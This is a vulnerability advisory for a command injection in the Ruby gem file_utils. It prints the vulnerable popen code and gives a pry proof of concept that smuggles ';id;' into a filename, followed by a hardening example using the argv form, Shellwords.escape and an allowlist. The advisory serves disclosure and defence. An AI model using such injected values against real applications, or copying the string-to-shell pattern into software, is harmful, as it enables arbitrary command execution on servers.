TITLE: Remote Command Injection in file_utils ruby gem
DOWNLOAD: http://rubygems.org/gems/file_utils
CVE: N/A

DESCRIPTION:
If the execute (or execute_command) method is used in a Rails app to run a command built from input taken from a remote user, shell commands can be injected. User input is not sanitized before being interpolated into a single command string that is passed to IO.popen() / Open3.popen3(); because the command is given as one string rather than an argument array, Ruby hands it to /bin/sh whenever it contains shell metacharacters, so a ";" in the input terminates the intended command and starts an attacker-controlled one.

CODE (gem source, lines 55-70):

require 'open3'

def execute command
  # A single string is handed to IO.popen, so /bin/sh parses it when it
  # contains metacharacters; nothing in the caller's input is escaped.
  IO.popen(command).each_line do |line|
    puts line
  end
end

def execute_command(command)
  output = nil
  error = nil
  status = nil

  # Same problem: the unescaped command string reaches /bin/sh via popen3.
  Open3.popen3(command) do |_, stdout, stderr|
    output = stdout.readlines
    error = stderr.readlines
    # Note: popen3 does not set $? here; the child's exit status is on the
    # wait thread yielded as the (ignored) fourth block argument.
    status = $?
  end
end  # the method continues in the gem source past line 70 (truncated here)

PoC:

larry@sp0rk:~$ pry -r 'file_utils/file_utils'
[1] pry(main)> include FileUtils
=> Object
[2] pry(main)> def process_file filename
[2] pry(main)*   execute("pdf2ps #{filename} outfile.ps")
[2] pry(main)* end
=> nil
[3] pry(main)> filename = "secret.rb;id;"    <-- user supplied input
=> "secret.rb;id;"
[4] pry(main)> process_file(filename)
Error: /undefined in password    <-- secret.rb was just a file lying around from another PoC
Operand stack:

Execution stack:
   %interp_exit .runexec2 --nostringval-- --nostringval-- --nostringval-- 2 %stopped_push --nostringval-- --nostringval-- --nostringval-- false 1 %stopped_push 1910 1 3 %oparray_pop 1909 1 3 %oparray_pop 1893 1 3 %oparray_pop 1787 1 3 %oparray_pop --nostringval-- %errorexec_pop .runexec2 --nostringval-- --nostringval-- --nostringval-- 2 %stopped_push --nostringval--
Dictionary stack:
   --dict:1167/1684(ro)(G)--   --dict:0/20(G)--   --dict:77/200(L)--
Current allocation mode is local
Current file position is 9
GPL Ghostscript 9.06: Unrecoverable error, exit code 1
uid=1000(larry) gid=1000(larry) groups=1000(larry),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),106(lpadmin),117(sambashare)    <-- output of the injected "id"
sh: 1: outfile.ps: not found    <-- the trailing argument is run as a separate command
=> #
[5] pry(main)>

AUTHOR: Larry W. Cashdollar (@_larry0)
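As an added illustration (not code from the advisory or from the file_utils gem), the following Ruby places the string-to-shell pattern from the CODE section next to two hardened forms: the argv form of Open3.capture3, which execs the program directly and never consults /bin/sh, and Shellwords.escape for the case where a shell is genuinely required, plus an allowlist check on the filename as defence in depth. "echo" stands in for pdf2ps so the example runs without Ghostscript, and the payload uses "echo INJECTED" in place of "id" so the output is deterministic; the function names, SAFE_NAME pattern and PAYLOAD constant are assumptions of this example.

```ruby
require 'open3'
require 'shellwords'

# Constructed payload standing in for the advisory's "secret.rb;id;".
# "id" is replaced by "echo INJECTED" so the result is deterministic.
PAYLOAD = 'secret.rb;echo INJECTED;'.freeze

# Mirrors the gem's execute(): one interpolated string reaches /bin/sh.
# "echo" stands in for pdf2ps so this runs without Ghostscript installed.
# Returns the child's stdout, which will contain the injected command's output.
def vulnerable_execute(filename)
  out, _err, _status = Open3.capture3("echo #{filename} outfile.ps")
  out
end

# Hardened: the argv form execs the program directly with no shell involved,
# so ";" and friends are passed to the program as literal data.
def safe_execute(filename)
  out, _err, _status = Open3.capture3('echo', filename, 'outfile.ps')
  out
end

# If a shell is unavoidable (pipes, redirections), escape every untrusted
# token individually before interpolating it into the command string.
def escaped_execute(filename)
  out, _err, _status = Open3.capture3("echo #{Shellwords.escape(filename)} outfile.ps")
  out
end

# Defence in depth: accept only a plain basename (no separators, no leading
# dot, no metacharacters) before the value goes anywhere near a command.
SAFE_NAME = /\A[A-Za-z0-9][A-Za-z0-9._-]*\z/.freeze
def safe_filename?(name)
  name.match?(SAFE_NAME)
end

if __FILE__ == $PROGRAM_NAME
  puts "string form:  #{vulnerable_execute(PAYLOAD).inspect}"   # two lines, "INJECTED" ran
  puts "argv form:    #{safe_execute(PAYLOAD).inspect}"         # one line, payload echoed literally
  puts "escaped form: #{escaped_execute(PAYLOAD).inspect}"      # same literal result via the shell
  puts "allowlist:    payload=#{safe_filename?(PAYLOAD)} secret.rb=#{safe_filename?('secret.rb')}"
end
```

The string form also leaves "outfile.ps" to be executed as a separate command (the "sh: 1: outfile.ps: not found" in the PoC), whereas with the argv form the whole payload arrives as a single argument and the trailing file name stays where it was intended.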